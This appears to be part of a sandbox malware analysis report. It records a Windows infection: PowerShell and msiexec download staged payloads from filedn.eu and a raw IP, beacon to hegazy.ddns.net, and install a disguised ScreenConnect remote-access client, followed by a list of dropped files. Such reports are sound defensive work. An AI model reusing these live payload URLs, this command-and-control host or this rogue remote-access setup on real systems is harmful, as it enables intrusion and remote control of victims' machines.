        powershell.exe
        Remote address:
        45.131.244.47:443
        Request
        GET /lmjM1ItiFCHjYA4JNRBYB34/differensrkker.dsp HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
        Host: filedn.eu
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Server: CacheHTTPd v1.0
        Date: Fri, 06 Dec 2024 16:04:43 +0000
        Content-Type: application/octet-stream
        Content-Length: 481096
        Etag: "8891952f3ee20a5ed8b80e5b48d3df3cf46abef6"
        Expires: Fri, 06 Dec 2024 22:04:43 +0000
        Content-Disposition: attachment; filename="differensrkker.dsp"
        Accept-Ranges: bytes
        Content-Transfer-Encoding: binary
        Connection: keep-alive
        Keep-Alive: timeout=30
      • flag-us
        DNS
        47.244.131.45.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        47.244.131.45.in-addr.arpa
        IN PTR
        Response
        47.244.131.45.in-addr.arpa
        IN PTR
        ea2-filednpcloudcom
      • flag-ch
        GET
        https://filedn.eu/lmjM1ItiFCHjYA4JNRBYB34/differensrkker.dsp
        powershell.exe
        Remote address:
        45.131.244.47:443
        Request
        GET /lmjM1ItiFCHjYA4JNRBYB34/differensrkker.dsp HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
        Host: filedn.eu
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Server: CacheHTTPd v1.0
        Date: Fri, 06 Dec 2024 16:04:53 +0000
        Content-Type: application/octet-stream
        Content-Length: 481096
        Etag: "8891952f3ee20a5ed8b80e5b48d3df3cf46abef6"
        Expires: Fri, 06 Dec 2024 22:04:43 +0000
        Content-Disposition: attachment; filename="differensrkker.dsp"
        Accept-Ranges: bytes
        Content-Transfer-Encoding: binary
        Connection: keep-alive
        Keep-Alive: timeout=30
      • flag-ch
        GET
        https://filedn.eu/lmjM1ItiFCHjYA4JNRBYB34/vietnam.ttf
        powershell.exe
        Remote address:
        45.131.244.47:443
        Request
        GET /lmjM1ItiFCHjYA4JNRBYB34/vietnam.ttf HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
        Host: filedn.eu
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Server: CacheHTTPd v1.0
        Date: Fri, 06 Dec 2024 16:04:53 +0000
        Content-Type: font/ttf
        Content-Length: 441388
        Etag: "a6cb7502ec1a6613ab06a311f3b3dff58fc011c1"
        Expires: Fri, 06 Dec 2024 22:04:53 +0000
        Accept-Ranges: bytes
        Content-Transfer-Encoding: binary
        Connection: keep-alive
        Keep-Alive: timeout=30
      • flag-us
        DNS
        197.87.175.4.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        197.87.175.4.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        18.31.95.13.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        18.31.95.13.in-addr.arpa
        IN PTR
        Response
      • flag-nl
        GET
        http://191.96.207.229/Galgebakkernes.cmd
        msiexec.exe
        Remote address:
        191.96.207.229:80
        Request
        GET /Galgebakkernes.cmd HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
        Host: 191.96.207.229
        Cache-Control: no-cache
        Response
        HTTP/1.1 404 Not Found
        Date: Fri, 06 Dec 2024 16:05:10 GMT
        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
        Content-Length: 300
        Content-Type: text/html; charset=iso-8859-1
      • flag-ch
        GET
        https://filedn.eu/lmjM1ItiFCHjYA4JNRBYB34/NqsCRohA211.bin
        msiexec.exe
        Remote address:
        45.131.244.47:443
        Request
        GET /lmjM1ItiFCHjYA4JNRBYB34/NqsCRohA211.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
        Host: filedn.eu
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: CacheHTTPd v1.0
        Date: Fri, 06 Dec 2024 16:05:11 +0000
        Content-Type: application/octet-stream
        Content-Length: 64576
        Etag: "bfcd649ffb4f3b7d01608fba4308dac4da8b1ac1"
        Expires: Fri, 06 Dec 2024 22:05:11 +0000
        Content-Disposition: attachment; filename="NqsCRohA211.bin"
        Accept-Ranges: bytes
        Content-Transfer-Encoding: binary
        Connection: keep-alive
        Keep-Alive: timeout=30
      • flag-us
        DNS
        229.207.96.191.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        229.207.96.191.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        233.38.18.104.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        233.38.18.104.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        23.149.64.172.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        23.149.64.172.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        195.178.17.96.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        195.178.17.96.in-addr.arpa
        IN PTR
        Response
        195.178.17.96.in-addr.arpa
        IN PTR
        a96-17-178-195deploystaticakamaitechnologiescom
      • flag-us
        DNS
        hegazy.ddns.net
        msiexec.exe
        Remote address:
        8.8.8.8:53
        Request
        hegazy.ddns.net
        IN A
        Response
        hegazy.ddns.net
        IN A
        104.243.35.241
      • flag-us
        DNS
        241.35.243.104.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        241.35.243.104.in-addr.arpa
        IN PTR
        Response
        241.35.243.104.in-addr.arpa
        IN PTR
        herbert swordboldnet
      • flag-nl
        GET
        http://191.96.207.229/Naborets.vbs
        msiexec.exe
        Remote address:
        191.96.207.229:80
        Request
        GET /Naborets.vbs HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
        Host: 191.96.207.229
        Cache-Control: no-cache
        Response
        HTTP/1.1 404 Not Found
        Date: Fri, 06 Dec 2024 16:05:17 GMT
        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
        Content-Length: 300
        Content-Type: text/html; charset=iso-8859-1
      • flag-ch
        GET
        https://filedn.eu/lmjM1ItiFCHjYA4JNRBYB34/NqsCRohA211.bin
        msiexec.exe
        Remote address:
        45.131.244.47:443
        Request
        GET /lmjM1ItiFCHjYA4JNRBYB34/NqsCRohA211.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
        Host: filedn.eu
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: CacheHTTPd v1.0
        Date: Fri, 06 Dec 2024 16:05:18 +0000
        Content-Type: application/octet-stream
        Content-Length: 64576
        Etag: "bfcd649ffb4f3b7d01608fba4308dac4da8b1ac1"
        Expires: Fri, 06 Dec 2024 22:05:11 +0000
        Content-Disposition: attachment; filename="NqsCRohA211.bin"
        Accept-Ranges: bytes
        Content-Transfer-Encoding: binary
        Connection: keep-alive
        Keep-Alive: timeout=30
      • flag-us
        DNS
        20.49.80.91.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        20.49.80.91.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        14.227.111.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        14.227.111.52.in-addr.arpa
        IN PTR
        Response
      • 185.49.126.73:443
        https://secure.todesk.help/Bin/ScreenConnect.Core.dll
        tls, http
        dfsvc.exe
        54.2kB
        2.2MB
        1048
        1575

        HTTP Request

        GET https://secure.todesk.help/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=242614d5-9b0d-42a9-99bd-6fcc80ac8cc3&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session

        HTTP Response

        200

        HTTP Request

        GET https://secure.todesk.help/Bin/ScreenConnect.Client.manifest

        HTTP Response

        200

        HTTP Request

        GET https://secure.todesk.help/Bin/ScreenConnect.ClientService.exe

        HTTP Response

        200

        HTTP Request

        GET https://secure.todesk.help/Bin/ScreenConnect.WindowsBackstageShell.exe

        HTTP Response

        200

        HTTP Request

        GET https://secure.todesk.help/Bin/ScreenConnect.WindowsFileManager.exe.config

        HTTP Response

        200

        HTTP Request

        GET https://secure.todesk.help/Bin/ScreenConnect.WindowsClient.exe.config

        HTTP Response

        200

        HTTP Request

        GET https://secure.todesk.help/Bin/ScreenConnect.WindowsBackstageShell.exe.config

        HTTP Response

        200

        HTTP Request

        GET https://secure.todesk.help/Bin/ScreenConnect.WindowsFileManager.exe

        HTTP Response

        200

        HTTP Request

        GET https://secure.todesk.help/Bin/ScreenConnect.Windows.dll

        HTTP Response

        200

        HTTP Request

        GET https://secure.todesk.help/Bin/ScreenConnect.WindowsClient.exe

        HTTP Response

        200

        HTTP Request

        GET https://secure.todesk.help/Bin/ScreenConnect.Client.dll

        HTTP Response

        200

        HTTP Request

        GET https://secure.todesk.help/Bin/ScreenConnect.ClientService.dll

        HTTP Response

        200

        HTTP Request

        GET https://secure.todesk.help/Bin/ScreenConnect.Core.dll

        HTTP Response

        200
      • 185.49.126.73:8041
        api.wisescreen.net
        ScreenConnect.ClientService.exe
        15.5kB
        79.9kB
        63
        93
      • 45.131.244.47:443
        https://filedn.eu/lmjM1ItiFCHjYA4JNRBYB34/differensrkker.dsp
        tls, http
        powershell.exe
        9.2kB
        505.7kB
        189
        368

        HTTP Request

        GET https://filedn.eu/lmjM1ItiFCHjYA4JNRBYB34/differensrkker.dsp

        HTTP Response

        200
      • 45.131.244.47:443
        https://filedn.eu/lmjM1ItiFCHjYA4JNRBYB34/differensrkker.dsp
        tls, http
        powershell.exe
        9.2kB
        505.7kB
        189
        368

        HTTP Request

        GET https://filedn.eu/lmjM1ItiFCHjYA4JNRBYB34/differensrkker.dsp

        HTTP Response

        200
      • 45.131.244.47:443
        https://filedn.eu/lmjM1ItiFCHjYA4JNRBYB34/vietnam.ttf
        tls, http
        powershell.exe
        13.7kB
        464.4kB
        260
        339

        HTTP Request

        GET https://filedn.eu/lmjM1ItiFCHjYA4JNRBYB34/vietnam.ttf

        HTTP Response

        200
      • 191.96.207.229:80
        http://191.96.207.229/Galgebakkernes.cmd
        http
        msiexec.exe
        545 B
        617 B
        8
        3

        HTTP Request

        GET http://191.96.207.229/Galgebakkernes.cmd

        HTTP Response

        404
      • 45.131.244.47:443
        https://filedn.eu/lmjM1ItiFCHjYA4JNRBYB34/NqsCRohA211.bin
        tls, http
        msiexec.exe
        3.4kB
        73.0kB
        62
        59

        HTTP Request

        GET https://filedn.eu/lmjM1ItiFCHjYA4JNRBYB34/NqsCRohA211.bin

        HTTP Response

        200
      • 104.243.35.241:6606
        hegazy.ddns.net
        tls
        msiexec.exe
        623 B
        2.3kB
        8
        6
      • 191.96.207.229:80
        http://191.96.207.229/Naborets.vbs
        http
        msiexec.exe
        401 B
        577 B
        5
        2

        HTTP Request

        GET http://191.96.207.229/Naborets.vbs

        HTTP Response

        404
      • 45.131.244.47:443
        https://filedn.eu/lmjM1ItiFCHjYA4JNRBYB34/NqsCRohA211.bin
        tls, http
        msiexec.exe
        3.5kB
        73.0kB
        64
        59

        HTTP Request

        GET https://filedn.eu/lmjM1ItiFCHjYA4JNRBYB34/NqsCRohA211.bin

        HTTP Response

        200
      • 104.243.35.241:8808
        hegazy.ddns.net
        tls
        msiexec.exe
        29.0kB
        963.3kB
        461
        784
      • 104.243.35.241:8808
        hegazy.ddns.net
        tls
        msiexec.exe
        678 B
        321 B
        6
        4
      • 8.8.8.8:53
        secure.todesk.help
        dns
        dfsvc.exe
        64 B
        80 B
        1
        1

        DNS Request

        secure.todesk.help

        DNS Response

        185.49.126.73

      • 8.8.8.8:53
        97.17.167.52.in-addr.arpa
        dns
        71 B
        145 B
        1
        1

        DNS Request

        97.17.167.52.in-addr.arpa

      • 8.8.8.8:53
        21.49.80.91.in-addr.arpa
        dns
        70 B
        145 B
        1
        1

        DNS Request

        21.49.80.91.in-addr.arpa

      • 8.8.8.8:53
        73.126.49.185.in-addr.arpa
        dns
        72 B
        132 B
        1
        1

        DNS Request

        73.126.49.185.in-addr.arpa

      • 8.8.8.8:53
        23.159.190.20.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        23.159.190.20.in-addr.arpa

      • 8.8.8.8:53
        95.221.229.192.in-addr.arpa
        dns
        73 B
        144 B
        1
        1

        DNS Request

        95.221.229.192.in-addr.arpa

      • 8.8.8.8:53
        api.wisescreen.net
        dns
        ScreenConnect.ClientService.exe
        64 B
        80 B
        1
        1

        DNS Request

        api.wisescreen.net

        DNS Response

        185.49.126.73

      • 8.8.8.8:53
        filedn.eu
        dns
        msiexec.exe
        55 B
        71 B
        1
        1

        DNS Request

        filedn.eu

        DNS Response

        45.131.244.47

      • 8.8.8.8:53
        47.244.131.45.in-addr.arpa
        dns
        72 B
        107 B
        1
        1

        DNS Request

        47.244.131.45.in-addr.arpa

      • 8.8.8.8:53
        197.87.175.4.in-addr.arpa
        dns
        71 B
        157 B
        1
        1

        DNS Request

        197.87.175.4.in-addr.arpa

      • 8.8.8.8:53
        18.31.95.13.in-addr.arpa
        dns
        70 B
        144 B
        1
        1

        DNS Request

        18.31.95.13.in-addr.arpa

      • 8.8.8.8:53
        229.207.96.191.in-addr.arpa
        dns
        73 B
        159 B
        1
        1

        DNS Request

        229.207.96.191.in-addr.arpa

      • 8.8.8.8:53
        233.38.18.104.in-addr.arpa
        dns
        72 B
        134 B
        1
        1

        DNS Request

        233.38.18.104.in-addr.arpa

      • 8.8.8.8:53
        23.149.64.172.in-addr.arpa
        dns
        72 B
        134 B
        1
        1

        DNS Request

        23.149.64.172.in-addr.arpa

      • 8.8.8.8:53
        195.178.17.96.in-addr.arpa
        dns
        72 B
        137 B
        1
        1

        DNS Request

        195.178.17.96.in-addr.arpa

      • 8.8.8.8:53
        hegazy.ddns.net
        dns
        msiexec.exe
        61 B
        77 B
        1
        1

        DNS Request

        hegazy.ddns.net

        DNS Response

        104.243.35.241

      • 8.8.8.8:53
        241.35.243.104.in-addr.arpa
        dns
        73 B
        108 B
        1
        1

        DNS Request

        241.35.243.104.in-addr.arpa

      • 8.8.8.8:53
        20.49.80.91.in-addr.arpa
        dns
        70 B
        145 B
        1
        1

        DNS Request

        20.49.80.91.in-addr.arpa

      • 8.8.8.8:53
        14.227.111.52.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        14.227.111.52.in-addr.arpa

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB

        Filesize

        2KB

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\204C1AA6F6114E6A513754A2AB5760FA_90B17EDAFA78E1CF65547D865DF1EA1B

        Filesize

        472B

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

        Filesize

        1KB

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB

        Filesize

        484B

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\204C1AA6F6114E6A513754A2AB5760FA_90B17EDAFA78E1CF65547D865DF1EA1B

        Filesize

        488B

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

        Filesize

        482B

      • C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\manifests\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92.cdf-ms

        Filesize

        24KB

      • C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\manifests\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06.cdf-ms

        Filesize

        3KB

      • C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\manifests\scre..dows_4b14c015c87c1ad8_0018.0003_none_57acc9dd3adfc036.cdf-ms

        Filesize

        5KB

      • C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\manifests\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013.cdf-ms

        Filesize

        6KB

      • C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\manifests\scre..ient_4b14c015c87c1ad8_0018.0003_none_e94a4fce0de1030a.cdf-ms

        Filesize

        2KB

      • C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\manifests\scre..tion_25b0fbb6ef7eb094_0018.0003_none_38bfca06a9457575.cdf-ms

        Filesize

        14KB

      • C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\manifests\scre..vice_4b14c015c87c1ad8_0018.0003_none_04888a4494511071.cdf-ms

        Filesize

        4KB

      • C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.ClientService.exe

        Filesize

        93KB

      • C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\Client.en-US.resources

        Filesize

        48KB

      • C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\Client.resources

        Filesize

        26KB

      • C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\app.config

        Filesize

        1KB

      • C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\user.config

        Filesize

        566B

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

        Filesize

        1KB

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

      • C:\Users\Admin\AppData\Local\Temp\Deployment\83J4OK83.PP5\CBDA911T.Q86\ScreenConnect.Client.dll

        Filesize

        192KB

      • C:\Users\Admin\AppData\Local\Temp\Deployment\83J4OK83.PP5\CBDA911T.Q86\ScreenConnect.Client.dll.genman

        Filesize

        1KB

      • C:\Users\Admin\AppData\Local\Temp\Deployment\83J4OK83.PP5\CBDA911T.Q86\ScreenConnect.ClientService.dll

        Filesize

        66KB

      • C:\Users\Admin\AppData\Local\Temp\Deployment\83J4OK83.PP5\CBDA911T.Q86\ScreenConnect.ClientService.dll.genman

        Filesize

        1KB

      • C:\Users\Admin\AppData\Local\Temp\Deployment\83J4OK83.PP5\CBDA911T.Q86\ScreenConnect.Core.dll

        Filesize

        536KB

      • C:\Users\Admin\AppData\Local\Temp\Deployment\83J4OK83.PP5\CBDA911T.Q86\ScreenConnect.Core.dll.genman

        Filesize

        1KB

      • C:\Users\Admin\AppData\Local\Temp\Deployment\83J4OK83.PP5\CBDA911T.Q86\ScreenConnect.Windows.dll

        Filesize

        1.6MB

      • C:\Users\Admin\AppData\Local\Temp\Deployment\83J4OK83.PP5\CBDA911T.Q86\ScreenConnect.Windows.dll.genman

        Filesize

        1KB

      • C:\Users\Admin\AppData\Local\Temp\Deployment\83J4OK83.PP5\CBDA911T.Q86\ScreenConnect.WindowsBackstageShell.exe

        Filesize

        59KB

      • C:\Users\Admin\AppData\Local\Temp\Deployment\83J4OK83.PP5\CBDA911T.Q86\ScreenConnect.WindowsClient.exe

        Filesize

        588KB

      • C:\Users\Admin\AppData\Local\Temp\Deployment\83J4OK83.PP5\CBDA911T.Q86\ScreenConnect.WindowsClient.exe.config

        Filesize

        266B

      • C:\Users\Admin\AppData\Local\Temp\Deployment\83J4OK83.PP5\CBDA911T.Q86\ScreenConnect.WindowsClient.exe.genman

        Filesize

        2KB

      • C:\Users\Admin\AppData\Local\Temp\Deployment\83J4OK83.PP5\CBDA911T.Q86\ScreenConnect.WindowsClient.exe.manifest

        Filesize

        17KB

      • C:\Users\Admin\AppData\Local\Temp\Deployment\83J4OK83.PP5\CBDA911T.Q86\ScreenConnect.WindowsFileManager.exe

        Filesize

        79KB

      • C:\Users\Admin\AppData\Local\Temp\Deployment\8T1H5NAM.77A\E7NZR975.X3N.application

        Filesize

        114KB

      • C:\Users\Admin\AppData\Local\Temp\Galgebakkernes.cmd

        Filesize

        300B

      • C:\Users\Admin\AppData\Roaming\Landbrugslovenes201.spr

        Filesize

        431KB

      • C:\Users\Admin\Documents\ConnectWiseControl\Temp\Caproyl.vbs

        Filesize

        66KB

      • C:\Windows\SystemTemp\ScreenConnect\24.3.7.9067\hVqvsfdxfEibrun.cmd

        Filesize

        6KB

      • C:\Windows\Temp\__PSScriptPolicyTest_lh3wiw3m.ddh.ps1

        Filesize

        60B

